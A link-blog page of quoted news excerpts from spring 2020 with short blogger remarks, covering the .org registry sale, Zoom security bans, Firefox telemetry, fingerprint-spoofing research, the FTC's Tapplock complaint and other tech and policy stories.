The Linkielist

Linking ideas with the world

The Linkielist

ICANN suffers split-personality disorder as deadline for .org sale decision draws close

Posted on by

With just seven days left until it has to make a decision on the $1.13bn sale of the .org registry to a private equity firm, DNS overseer ICANN appears in chaos.

In a series of communications from senior executives, ICANN has embarked on a public negotiation with potential buyer Ethos Capital over the sale of the domain, while at the same time aggressively questioning its corporate structure.

A blog post from ICANN’s CEO Goran Marby late last week highlighted revised “public interest commitments” (PICs) that Ethos Capital had published as a way to resolve ongoing concerns over the sale, and gave the clear signal that ICANN is intending to approve the deal on April 20.

There has been a clear negotiation between the two sides: Marby’s post came one day after an email from Ethos’ lawyer (since published [PDF] noted that the new changes were in direct response to a letter from ICANN sent just a few days earlier. “In making these changes, they specifically focused on changes that go to the clarity and enforceability of the PICs as you mentioned,” Ethos noted.

At the same time as it is moving forward on a deal, however, ICANN continues to dig [PDF] into Ethos Capital’s unusual corporate structure: something that critics say is no more a corporate shell game designed to hide the true owners of the company.

ICANN is also looking at its financing of the deal, which financial experts have warned is typical of a debt-leveraged buyout where a founding firm is saddled with debt after the financiers walk away with a healthy profit.

Debt pile

“Can you please provide more detail on PIR’s current plans with respect to the repayment of the $360m term loan at the maturity date in light of Ethos Capital’s ten plus investment horizon for PIR?,” reads just one of dozens of pointed questions in a letter from ICANN to the company nominally in charge of .org, Public Interest Registry (PIR).

Another makes it plain that ICANN believes information is being hidden: “ICANN has specifically requested that PIR provide the entities and individuals that will ‘control’ PIR post-transaction as that is defined in PIR’s registry agreements. PIR has provided some information regarding share ownership but has not provided the specific information regarding ‘control’.”

There are no less than six different companies involved on the Ethos side of the transaction, all of them based in Delaware, a common base for shell companies, and all but one was incorporated on the same day, October 24, 2019.

In addition to Ethos Capital LLC, which was incorporated in May – the day after ICANN made it clear it was planning to remove price caps on .org domains in a decision worth tens of millions of dollars – there is also Ethos Purpose GP, LLC, and then four “Purpose Domains” companies: Purpose Domains Direct, Feeder, Holdings and Investments.

ICANN has asked for the directors of each of these companies and the structural connections between them but from published letters from Ethos and ICANN is it clear that Ethos has been withholding specific pieces of information.

Public interest

In addition to this mixed message, ICANN has still not outlined its decision-making process despite repeat calls from the internet community, including the world’s governments, to do so.

There is an obvious public interest in the sale of millions of .org domains but ICANN has repeatedly failed to say how or whether it will factor that in its decision. At a recent public meeting its general counsel failed to use the term “public interest” when discussing how a decision would be made; an omission that prompted the Governmental Advisory Committee (GAC) to pointedly note [PDF] that the ICANN Board had told it that “all options remain open and that the Board will consider the public interest in its decision-making.”

However, when PIR argued that ICANN only had grounds to reject the sale on issues of “security, reliability, or stability of services,” ICANN pushed back saying that it would not accept “any artificial restriction,” and noted “the obvious importance to the public interest of its operation.”

ICANN changes tune however when other groups point to “public interest” as a key reason for denying the sale. In his most recent letter to the GAC [PDF], ICANN’s chair Maarten Bottermann said that the organization “will apply a standard of reasonableness in making its determination on whether to provide or withhold its consent to the request.”

In a second sentence, he then notes that “the ICANN Board will continue to consider the public interest in all its decision-making using the totality of the information received.”

The difference between “apply” and “consider” is not lost on those watching the process; nor is the fact that ICANN has failed to define the term “reasonableness,” despite it now being the main factor of consideration.

[…]

Source: ICANN suffers split-personality disorder as deadline for .org sale decision draws close • The Register

Amazon hiring 75,000 more workers as demand rises due to coronavirus, after hiring 100k more last month

Posted on by

Amazon is hiring an additional 75,000 workers at its facilities, on top of the 100,000 new positions it created last month, the company said Monday.

In March, the company said it would hire additional warehouse and delivery workers across the country amid a surge in online shopping during the coronavirus outbreak. Since then, Amazon said it has hired more than 100,000 new employees and, as a result, is staffing up even more to help fulfill orders.

“We continue to see increased demand as our teams support their communities, and are going to continue to hire, creating an additional 75,000 jobs to help serve customers during this unprecedented time,” the company said.

As it continues to hire more workers, Amazon has also raised employees’ hourly pay and doubled overtime pay for warehouse workers. Through the end of April, warehouse and delivery workers can earn an additional $2 per hour in the U.S., 2 pounds per hour in the U.K., and approximately 2 euros per hour in many EU countries. Amazon currently pays $15 per hour or more in some areas of the U.S. for warehouse and delivery jobs.

Amazon has announced several benefits changes on top of the pay increases. The company has allowed workers to take unlimited unpaid time off and provides two weeks of paid leave for workers who tested positive for the virus or are in quarantine.

Amazon said it expects to continue investing in pay increases, benefits and safety improvements for warehouse and delivery workers. The company previously expected to spend $350 million on pay increases, but now estimates it will spend more than $500 million on those efforts.

Despite the pay increases and benefits changes, Amazon workers from at least three facilities have staged protests to call for the company to better protect workers amid the coronavirus outbreak. A dozen workers told CNBC they felt Amazon needed to provide employees with paid time off, among other concerns.

Source: Amazon hiring 75,000 more workers as demand rises due to coronavirus

Suspicious senate stock sale spurt spurs scrutiny scheme: This website tracks which shares US senators are unloading mid-pandemic

Posted on by

In the wake of reports last month that four US senators sold stocks shortly after a classified briefing on January 24 about the risk posed by the novel coronavirus, Timothy Carambat, a mechanical and software engineer, created a website to make stock sales by every senator more visible.

In an email to The Register, Carambat, who runs a design firm based in Covington, Louisiana, called Industrial Object, explained he was motivated to create Senate Stock Watcher after news broke that Senators Richard Burr (R-NC), Dianne Feinstein (D-CA), James Inhofe (R-OK), and Kelly Loeffler (R-GA) had dumped stocks before most people in America understood the implications of the outbreak. It is illegal for senators to buy and sell shares using non-public information.

Burr, chairman of the Senate Intelligence Committee, has been sued for alleged securities fraud, a charge he has denied. It is said he unloaded up to $1.7m in stocks in mid-February, particularly in hotel groups that would be later hit hard by the virus pandemic, all while receiving daily confidential briefings about the impact of the bio-nasty – and reassuring the public everything would be fine.

“As public servants, there are some senators making alarmingly large money movements at what would seem to be very fortunate timing in the market,” Carambat said.

“I understand some senators were previously very accomplished businesspeople, but in my opinion, the level of access they have to information currently is highly privileged and it would only make sense to keep their own financial best interests at heart.”

Details about the stock sales in news reports prompted Carambat to look into the source of the data, which turned out to be the US Senate Financial Disclosures website.

Source: Suspicious senate stock sale spurt spurs scrutiny scheme: This website tracks which shares US senators are unloading mid-pandemic • The Register

Twitter Obliterates Its Users’ Privacy Choices

Posted on by

The EFF’s staff technologist — also an engineer on Privacy Badger and HTTPS Everywhere, writes: Twitter greeted its users with a confusing notification this week. “The control you have over what information Twitter shares with its business partners has changed,” it said. The changes will “help Twitter continue operating as a free service,” it assured. But at what cost?

Twitter has changed what happens when users opt out of the “Allow additional information sharing with business partners” setting in the “Personalization and Data” part of its site. The changes affect two types of data sharing that Twitter does… Previously, anyone in the world could opt out of Twitter’s conversion tracking (type 1), and people in GDPR-compliant regions had to opt in. Now, people outside of Europe have lost that option. Instead, users in the U.S. and most of the rest of the world can only opt out of Twitter sharing data with Google and Facebook (type 2).
The article explains how last August Twitter discovered that its option for opting out of device-level targeting and conversion tracking “did not actually opt users out.” But after fixing that bug, “advertisers were unhappy. And Twitter announced a substantial hit to its revenue… Now, Twitter has removed the ability to opt out of conversion tracking altogether.”

While users in Europe are protected by GDPR, “users in the United States and everywhere else, who don’t have the protection of a comprehensive privacy law, are only protected by companies’ self-interest…” BoingBoing argues that Twitter “has just unilaterally obliterated all its users’ privacy choices, announcing the change with a dialog box whose only button is ‘OK.’

Source: Twitter Accused of Obliterating Its Users’ Privacy Choices – Slashdot

Mozilla installs Scheduled Telemetry Task on Windows with Firefox 75 – if you had put telemetry on

Posted on by

Observant Firefox users on Windows who have updated the web browser to Firefox 75 may have noticed that the upgrade brought along with it a new scheduled tasks. The scheduled task is also added if Firefox 75 is installed on a Windows device.

The task’s name is Firefox Default Browser Agent and it is set to run once per day. Mozilla published a blog post on the official blog of the organization that provides information on the task and why it has been created.

firefox default browser agent

According to Mozilla, the task has been created to help the organization “understand changes in default browser settings”. At its core, it is a Telemetry task that collects information and sends the data to Mozilla.

Here are the details:

  • The Task is only created if Telemetry is enabled. If Telemetry is set to off (in the most recently used Firefox profile), it is not created and thus no data is sent. The same is true for Enterprise telemetry policies if they are configured. Update: Some users report that the task is created while Telemetry was set to off on their machine.
  • Mozilla collects information “related to the system’s current and previous default browser setting, as w2ell as the operating system locale and version”.
  • Mozilla notes that the data cannot be “associated with regular profile based telemetry data”.
  • The data is sent to Mozilla every 24 hours using the scheduled task.

Mozilla added the file default-browser-agent.exe to the Firefox installation folder on Windows which defaults to C:\Program Files\Mozilla Firefox\.

Firefox users have the following options if they don’t want the data sent to Mozilla:

  • Firefox users who opted-out of Telemetry are good, they don’t need to make any change as the new Telemetry data is not sent to Mozilla; this applies to users who opted-out of Telemetry in Firefox or used Enterprise policies to do so.
  • Firefox users who have Telemetry enabled can either opt-out of Telemetry or deal with the task/executable that is responsible.

Disable the Firefox Default Browser Agent task

firefox-browser agent task disabled

Here is how you disable the task:

  1. Open Start on the Windows machine and type Task Scheduler.
  2. Open the Task Scheduler and go to Task Scheduler Library > Mozilla.
  3. There you should find listed the Firefox Default Browser Agent task.
  4. Right-click on the task and select Disable.
  5. Note: Nightly users may see the Firefox Nightly Default Browser Agent task there as well and may disable it.

The task won’t be executed anymore once it is disabled.

Closing Words

The new Telemetry task is only introduced on Windows and runs only if Telemetry is enabled (which it is by default [NOTE: Is it? I don’t think so! It asks at install!]). Mozilla is transparent about the introduction and while that is good, I’d preferred if the company would have informed users about it in the browser after the upgrade to Firefox 75 or installation of the browser and before the task is executed the first time.

Source: Mozilla installs Scheduled Telemetry Task on Windows with Firefox 75 – gHacks Tech News

Go  to about:telemetry in Firefox to see what it’s collecting. In my case this was none, because when FF was installed it asked me whether I wanted it on or off and I said off.

Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

Posted on by

Only a few months have passed since we reported that the New York-to-Los Angeles Cannonball record was broken. It’s allegedly been broken again. The 26 hour, 38 minute time—which beats the record set in November by more than 45 minutes—appears to be legitimate, according to Ed Bolian, a Cannonball insider and driver who set his own 28 hour, 50 minute record in 2013. Alex Roy, who set the first modern NYC-to-LA record in 2006, also said the new claim is credible based on his analysis of multiple sources.

“It was not me,” Bolian was quick to point out to Road & Track, eager to quell an Internet-generated rumor that perhaps he had been the one to pull it off.

All we know about this new set of scofflaws is that there were three, maybe four of them, and that they were driving a white 2019 Audi A8 sedan with a pair of red plastic marine fuel tanks ratchet-strapped into its trunk. They started at the Red Ball Garage in New York City at 11:15 pm on April 4, and ended less than 27 hours later at the Portofino Hotel & Marina in Redondo Beach, California, the traditional start and end points of a Cannonball attempt.

We also know that their timing was awful. It doesn’t seem likely that the new record-holders were keen to have news reach the public so soon, especially at a time when so many people are understandably on edge. But an exuberant friend posted a picture of the Audi on Facebook this week—situated among a number of other high-dollar cars, with its trunk open to show the auxiliary fuel tanks—along with the team’s alleged time. Within a day, hundreds of people had shared the post, and social media chat groups were abuzz with Cannonball aficionados offering up opinions on the matter.

Source: Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

There’s some whining about it being in poor taste or something. Whatever.

The US Senate reportedly advised members to stop using Zoom

Posted on by

US senators have been advised not to use videoconferencing platform Zoom over security concerns, the Financial Times reports.

According to three people briefed on the matter, the Senate sergeant-at-arms – whose job it is to run law enforcement and security on the Capitol – told senators to find alternative methods for remote working, although he did not implement an outright ban.

With the coronavirus outbreak forcing millions to work from home, Zoom has seen a 1,900% increase in use between December and March to 200 million daily users. This has been accompanied by a string of bad press about its security and privacy practices, to the point where CEO Eric Yuan was forced to publicly apologize last week.

This week the company admitted to “mistakenly” routing data through China in a bid to secure more server space to deal with skyrocketing demand. “We failed to fully implement our usual geo-fencing best practices. As a result, it is possible certain meetings were allowed to connect to systems in China, where they should not have been able to connect,” Yuan said.

The news sparked outrage among some senators, and Senate Democrat Richard Blumenthal called for the FTC to launch an investigation into the company.

“As Zoom becomes embedded in Americans’ daily lives, we urgently need a full & transparent investigation of its privacy and security,” the senator tweeted.

The slew of privacy issues has also prompted the Taiwanese government to ban its officials from using Zoom, and Google banned use of the app on work computers due to its “security vulnerabilities.”

While the Senate has told its members to stay away from Zoom, the Pentagon told the FT that it would continue to allow its staff to use the platform. A memo sent to top cybersecurity officials from the Department of Homeland Security said that the company was being responsive when questioned about concerns over the security of its software, Reuters reported.

Source: The US Senate reportedly advised members to stop using Zoom

Singapore stops teachers using Zoom app after ‘very serious incidents’ (Zoom bombing)

Posted on by

Singapore has suspended the use of video-conferencing tool Zoom by teachers after “very serious incidents” in the first week of a coronavirus lockdown that has seen schools move to home-based learning.

FILE PHOTO: FILE PHOTO: Zoom logo is seen in front of diplayed coronavirus disease (COVID-19) in this illustration taken March 19, 2020. REUTERS/Dado Ruvic/Illustration

One incident involved obscene images appearing on screens and strange men making lewd comments during the streaming of a geography lesson with teenage girls, media said.

Zoom Video Communications Inc (ZM.O) has faced safety and privacy concerns over its conferencing app, use of which has surged in offices and schools worldwide after they shut to try and curb virus infections.

“These are very serious incidents,” Aaron Loh of the education ministry’s technology division said on Friday, without giving details.

“The Ministry of Education (MOE) is currently investigating both breaches and will lodge a police report if warranted.

“As a precautionary measure, our teachers will suspend their use of Zoom until these security issues are ironed out.”

Loh said they ministry would further advise teachers on security protocols, such as requiring secure log-ins and not sharing the meeting link beyond the students in the class.

Source: Singapore stops teachers using Zoom app after ‘very serious incidents’ – Reuters

After 50 Years of Effort, Researchers Made Silicon Emit Light, could improve computer speeds vastly

Posted on by

Modern transistors, which function as a computer’s brain cells, are only a few atoms long. If they are packed too tightly, that can cause all sorts of problems: electron traffic jams, overheating, and strange quantum effects. One solution is to replace some electronic circuits with optical connections that use photons instead of electrons to carry data around a chip. There’s just one problem: Silicon, the main material in computer chips, is terrible at emitting light.

Now, a team of European researchers says they have finally overcome this hurdle. On Wednesday, a research team led by Erik Bakkers, a physicist at Eindhoven University of Technology in the Netherlands, published a paper in Nature that details how they grew silicon alloy nanowires that can emit light. It’s a problem that physicists have grappled with for decades, but Bakkers says his lab is already using the technique to develop a tiny silicon laser that can be built into computer chips. Integrating photonic circuits on conventional electronic chips would enable faster data transfer and lower energy consumption without raising the chip’s temperature, which could make it particularly useful for data-intensive applications like machine learning.

“It’s a big breakthrough that they were able to demonstrate light emission from nanowires made of a silicon mixture, because these materials are compatible with the fabrication processes used in the computer chip industry,” says Pascal Del’Haye, who leads the microphotonics group at the Max Planck Institute for the Science of Light and was not involved in the research. “In the future, this might enable the production of microchips that combine both optical and electronic circuits.”

Source: After 50 Years of Effort, Researchers Made Silicon Emit Light | WIRED

Stanislascollege Pijnacker stopt ook met Zoom door ‘beelden die niet door de beugel kunnen’: porno en Hitler snor tijdens Duits

Posted on by
PIJNACKER – Het Stanislascollege in Pijnacker stopt per direct met het gebruik van de video-app Zoom voor het geven van online lessen. De school heeft meerdere berichten ontvangen van leerlingen, ouders en docenten dat er tijdens de lessen beelden of teksten te zien zijn die niet door de beugel kunnen.

Woensdag besloot het Zoetermeerse Erasmus College ook onmiddellijk te stoppen met Zoom, nadat leerlingen pornobeelden te zien kregen tijdens een online les. Het Stanislascollege heeft zes scholen, verdeeld over Delft, Pijnacker en Rijswijk.

‘In de meeste gevallen lijken de beelden of teksten getoond te worden door personen die niet aan de school verbonden zijn en zich onrechtmatig toegang hebben verschaft tot de les’, schrijft de school in een brief aan ouders.

Hitler-snorretje tijdens les Duits

Volgens regiodirecteur Fons Loogman van Stichting Lucas Onderwijs, waar het Stanislascollege onder valt, zijn er kleine incidenten geweest. ‘Leerlingen sturen een uitnodigingslink door aan derden die dan ook mee kunnen kijken met de les, daar heb je dan geen controle op. Zo is er bijvoorbeeld tijdens een les Duits ergens een Hitlergroet of een Hitler-snorretje getoond.’

Het incident met pornobeelden in Zoetermeer was voor de school in Pijnacker echter de doorslag om te stoppen met Zoom. ‘Daarnaast werden we de afgelopen week al attent gemaakt op berichten uit de ICT-wereld dat Zoom niet veilig is. Zo verzamelen ze informatie, zijn er onveilige beveiligingsstructuren en is het makkelijk te hacken’, zegt Loogman.

Source: Stanislascollege Pijnacker stopt ook met Zoom door ‘beelden die niet door de beugel kunnen’ – Omroep West

Porno tijdens online les van Zoetermeerse school dus stoppen met Zoom

Posted on by
ZOETERMEER – Leerlingen van een klas van het Zoetermeerse Erasmus College hebben woensdagochtend, tijdens een les via de video-app Zoom, pornobeelden te zien gekregen. De school is onmiddellijk gestopt met het gebruik van Zoom.

‘We snappen dat jullie ontzettend geschrokken zijn’, schrijft de school in een mail aan de betreffende leerlingen. ‘We hebben natuurlijk direct alle Zoom-lessen stopgezet en gaan kijken naar een andere methode om thuis les te geven.’

Directeur-bestuurder Roderik Rot bevestigt dat er pornografische beelden te zien zijn geweest en dat om die reden alle lessen zijn gestopt. ‘Ja, er is één klas geweest, waarbij daarvan kort sprake was.’ Om hoeveel leerlingen het gaat kan Rot niet zeggen: ‘Een klas bestaat nooit uit meer dan dertig leerlingen en meestal is het bij die online lessen zo dat niet alle leerlingen erbij zijn.’ Op de vraag om welke les het ging, wil hij uit privacyoverwegingen niet ingaan. De school bood leerlingen aan om indien gewenst contact op te nemen met een hulpteam, maar daarvan is voor zover bekend door niemand gebruik gemaakt.

Gestopt met online lessen

Het Erasmus College is nu dus meteen gestopt met Zoom. Volgens Rot had de school dat al in gang gezet. Een externe privacyadviseur had al gezegd dat Zoom, onder strikte voorwaarden, te gebruiken was, maar dat hij toch andere programma’s adviseerde. ‘Dus we hebben gisteren de ouders allemaal bericht dat we gaan overstappen naar iets anders. En dat we daar druk mee bezig zijn.’

[…]

ID’s onveilig gedeeld

Volgens het Delftse cybersecuritybedrijf Fox-IT is het onwaarschijnlijk dat Zoom zelf is gehackt. Security-expert Sanne Maasakkers: ‘Zoom is een heel groot softwarebedrijf waar iedere dag veel mensen met de beveiliging bezig zijn.’ Volgens Maasakkers is het aannemelijker dat uitnodigingscodes in handen terecht zijn gekomen van mensen die niet op de vergadering zijn uitgenodigd.

Iedere deelnemer krijgt zo’n ID. Als die niet is beveiligd met een wachtwoord, dan kunnen buitenstaanders inbreken in een Zoom-meeting, wat met een wachtwoord veel moeilijker is, tenzij een deelnemer zelf is gehackt.

Source: Porno tijdens online les van Zoetermeerse school: ‘Onwaarschijnlijk dat Zoom is gehackt’ – Omroep West

Nee, het is niet echt ‘gehackt’ in die zin dat het zo’n slechte beveiliging heeft dat je gewoon een  ID in kan voeren en daar lukraak porno naar kan sturen.

Trump signs executive order to support moon mining, tap asteroid resources

Posted on by

The water ice and other lunar resources that will help the United States establish a long-term human presence on the moon are there for the taking, the White House believes.

President Donald Trump signed an executive order today (April 6) establishing U.S. policy on the exploitation of off-Earth resources. That policy stresses that the current regulatory regime — notably, the 1967 Outer Space Treaty — allows the use of such resources.

This view has long held sway in U.S. government circles. For example, the United States, like the other major spacefaring nations, has not signed the 1979 Moon Treaty, which stipulates that non-scientific use of space resources be governed by an international regulatory framework. And in 2015, Congress passed a law explicitly allowing American companies and citizens to use moon and asteroid resources.

The new executive order makes things even more official, stressing that the United States does not view space as a “global commons” and sees a clear path to off-Earth mining, without the need for further international treaty-level agreements.

The executive order, called “Encouraging International Support for the Recovery and Use of Space Resources,” has been in the works for about a year, a senior administration official said during a teleconference with reporters today. The order was prompted, at least in part, by a desire to clarify the United States’ position as it negotiates with international partners to help advance NASA’s Artemis program for crewed lunar exploration, the official added. (Engagement with international partners remains important, the official said.)

Artemis aims to land two astronauts on the moon in 2024 and to establish a sustainable human presence on and around Earth’s nearest neighbor by 2028. Lunar resources, especially the water ice thought to be plentiful on the permanently shadowed floors of polar craters, are key to Artemis’ grand ambitions, NASA officials have said.

The moon is not the final destination for these ambitions, by the way. Artemis is designed to help NASA and its partners learn how to support astronauts in deep space for long stretches, lessons that will be key to putting boots on Mars, which NASA wants to do in the 2030s.

“As America prepares to return humans to the moon and journey on to Mars, this executive order establishes U.S. policy toward the recovery and use of space resources, such as water and certain minerals, in order to encourage the commercial development of space,” Scott Pace, deputy assistant to the president and executive secretary of the U.S. National Space Council, said in a statement today.

President Trump has shown considerable interest in shaping U.S. space policy. In December 2017, for example, he signed Space Policy Directive-1, which laid the groundwork for the Artemis campaign. Two other directives have aimed to streamline commercial space regulation and the protocols for space traffic control. And Space Policy Directive-4, which the president signed in February 2019, called for the creation of the Space Force, the first new U.S. military branch since the Air Force was stood up in 1947.

Source: Trump signs executive order to support moon mining, tap asteroid resources | Space

Attackers can bypass fingerprint authentication with an ~80% success rate

Posted on by

For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.

Further Reading

Bypassing TouchID was “no challenge at all,” hacker tells Ars

Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.

A very high probability

A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time.

The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of from one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.

Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.

“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking,” Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person’s privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”

Source: Attackers can bypass fingerprint authentication with an ~80% success rate | Ars Technica

Google Bans Zoom Videoconferencing Software From Employees’ Computers

Posted on by

Google has banned the popular videoconferencing software Zoom from its employees’ devices, BuzzFeed News has learned. Zoom, a competitor to Google’s own Meet app, has seen an explosion of people using it to work and socialize from home and has become a cultural touchstone during the coronavirus pandemic.

Last week, Google sent an email to employees whose work laptops had the Zoom app installed that cited its “security vulnerabilities” and warned that the videoconferencing software on employee laptops would stop working starting this week.

“We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network,” Jose Castaneda, a Google spokesperson, told BuzzFeed News. “Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Source: Google Bans Zoom Videoconferencing Software From Employees’ Computers

Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts – yeah I thought they wanted to keep out the immigrants or something?

Posted on by

Two planeloads of Eastern European farmhands arrived Thursday in Berlin and Duesseldorf amid strict precautions to protect the country from the new coronavirus, as an ambitious German program to import thousands of seasonal agricultural workers got underway.

Seasonal workers had been caught up in the country’s ban on travel after the outbreak of the coronavirus. That left a massive deficit in personnel available to pick asparagus, which has already sprouted, and plant other crops in German fields, where some 300,000 such workers were employed last year.

Most came from Eastern European countries such as Romania, Bulgaria, Ukraine, and Hungary, where wages are much lower than in Germany, which is Europe’s largest economy.

Under the new program, workers need to fly to the country in controlled groups — to prevent the possible infection of others en route — and are subject to medical checks upon arrival. They then must live and work separately from other farmhands for two weeks, and wear protective gear.

Announcing the program, Agriculture Minister Julia Kloecker said it was a “pragmatic and goal-oriented solution” that would allow up to 40,000 seasonal workers into the country in April, and another 40,000 in May. She said the hope was to find an additional 20,000 over the two months among Germany’s own unemployed, students or resident asylum seekers.

“This is important and good news for our farmers,” she said. “Because the harvest doesn’t wait and you can’t delay sowing the fields.”

Ahead of time, interested workers have to register online and have their information checked by federal police. Farmers needing help register online with Eurowings, the airline contracted to bring the workers in, saying when they’re needed and where.

So far, 9,900 people had registered for April and another 4,300 for May.

Flights are then organized to bring in groups, and the first group of workers, 530 people from Romania, arrived on Thursday in Duesseldorf and Berlin, Eurowings said. Further flights were already planned to Duesseldorf, Karlsruhe, Leipzig, Nuremberg and Frankfurt.

Source: Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts | Time

Rocket Lab proves it can recover a rocket in mid-air by catching it with a helicopter

Posted on by

Last year, Rocket Lab announced that it would attempt to reuse the first stage of its Electron rocket. The company’s goal is to catch the stage as it falls back towards the ocean by plucking it out of mid-air with a helicopter. While that’s ambitious, a video released today shows that Rocket Lab may not be too far off. The clip shows one helicopter dropping an Electron test stage and another hooking the stage’s parachute with a grappling hook and towing it back to land.

Rocket Lab pulled off this stunt in early March. One helicopter dropped the Electron test stage over open ocean in New Zealand. A second helicopter caught it, on the first attempt, at around 5,000 feet.

Next, Rocket Lab will attempt to recover a full Electron first stage following a launch. It won’t pull that from the air but will retrieve the rocket stage after it lands in the ocean. A parachute will help slow its descent, and like previous versions, it will include instrumentation to “inform future recovery efforts.” That mission is planned for late 2020.

Of course, catching a rocket stage after an actual launch is a lot different than catching one that’s dropped neatly by a helicopter. But the feat is a key milestone, as Rocket Lab’s plans to reuse the rockets depend on this recovery method. If it’s successful, Rocket Lab will be able to lower costs, and in theory, that may lead to more launches.

Source: Rocket Lab proves it can recover a rocket in mid-air | Engadget

Easy-to-pick “smart” locks gush personal data, FTC finds

Posted on by

A padlock—whether it uses a combination, a key, or “smart” tech—has exactly one job: to keep your stuff safe so other people can’t get it. Tapplock, Inc., based in Canada, produces such a product. The company’s locks unlock with a fingerprint or an app connected by Bluetooth to your phone. Unfortunately, the Federal Trade Commission said, the locks are full of both digital and physical vulnerabilities that leave users’ stuff, and data, at risk.

The FTC’s complaint (PDF) against Tapplock, released Monday, basically alleges that the company misrepresented itself, because it marketed its products as secure and tested when they were neither. A product—any product—simply being kind of crappy doesn’t necessarily fall under the FTC’s purview. Saying untrue things about your product in your advertisement or privacy policy, however, will make the commission very unhappy with you indeed.

“We allege that Tapplock promised that its Internet-connected locks were secure, but in fact the company failed to even test if that claim was true,” Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a written statement. “Tech companies should remember the basics—when you promise security, you need to deliver security.”

Tapplock’s advertisements say its flagship product, the Tapplock One, can store up to 500 user fingerprints and can be connected to an “unlimited” number of devices through the app—a design optimized for something many people need to be able to access and for which handing off a physical key is impractical. To make the $99 lock work, Tapplock collects a great deal of personal information on its users, including usernames, email addresses, profile photos, location history, and the precise location of a user’s lock.

[…]

The lock may be built with “7mm reinforced stainless steel shackles, strengthened by double-layered lock design with anti-shim and anti-pry technologies,” as Tapplock’s website promises, but according to the FTC, perhaps it should have considered anti-screwdriver technologies. As it turns out, a researcher was able to unlock the lock “within a matter of seconds” by unscrewing the back panel. Oops.

The complaint also pointed to several “reasonably foreseeable” software vulnerabilities that the FTC alleges Tapplock could have avoided if the company “had implemented simple, low-cost steps.”

One vulnerability security researchers identified allowed a user to bypass the account authentication process entirely in order to gain full access to the account of literally any Tapplock user, including their personal information. And how could this happen? “A researcher who logged in with a valid user credential could then access another user’s account without being re-directed back to the login page, thereby allowing the researcher to circumvent Respondent’s authentication procedures altogether,” the complaint explains.

A second vulnerability allowed researchers the ability to access and unlock any lock they could get close enough to with a working Bluetooth connection. That’s because Tapplock “failed to encrypt the Bluetooth communication between the lock and the app,” leaving the data wide open for the researchers to discover and replicate.

The third vulnerability outlined in the complaint also has to do with a failure to secure communication data. That app that allows “unlimited” connections? The primary owner can of course add and revoke authorized users from the lock. But someone whose access was revoked could still access the lock because the vulnerability allowed for sniffing out the relevant data packets.

How’d this happen?

And how did Tapplock fail to discover any of these weaknesses? Because the company did not have a security program prior to the third-party researchers’ discoveries, the FTC alleges.

Source: Easy-to-pick “smart” locks gush personal data, FTC finds | Ars Technica

Zoom banned by Taiwan’s government over China security fears

Posted on by

Zoom has been banned from government business in Taiwan in the latest setback for the hugely popular video-calling app.

It follows revelations that some Zoom traffic was “mistakenly” routed through China, which does not recognise Taiwan’s independence.

Taiwan’s government said public bodies should not use products with security concerns “such as Zoom”.

But competitors like Google and Microsoft were acceptable, it said.

China considers Taiwan a breakaway rebel province, destined to be reunited with the mainland.

Last week, researchers discovered that some traffic from the video-calling app was being sent through Beijing – even when all participants on the Zoom call were in North America.

The team from University of Toronto’s Citizen Lab also highlighted that Zoom has several hundred employees in mainland China, which “could also open up Zoom to pressure from Chinese authorities”.

Zoom said the traffic was “mistakenly” routed through Beijing, and apologised.

Despite the response from Zoom, Taiwan has told its public institutions to use other software.

Where possible, domestic solutions should be used, it said, adding that in special circumstances, Google or Microsoft’s apps were acceptable. Those firms operate the Duo and Skype services respectively.

It is the latest blow to Zoom, which has exploded in popularity during the coronavirus pandemic, resulting in increased scrutiny.

Source: Zoom banned by Taiwan’s government over China security fears – BBC News

Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right – the extremist kinds of far right

Posted on by

Clearview AI, the dystopian face recognition company that claims to have amassed a database of billions of photos, signed contracts with hundreds of law enforcement agencies, and shopped its app around to the rich and powerful, has extensive links to the far right, according to a Huffington Post investigation. In fact, one of its associates claimed to have been working on a face recognition product explicitly designed to be useful for mass deportations.

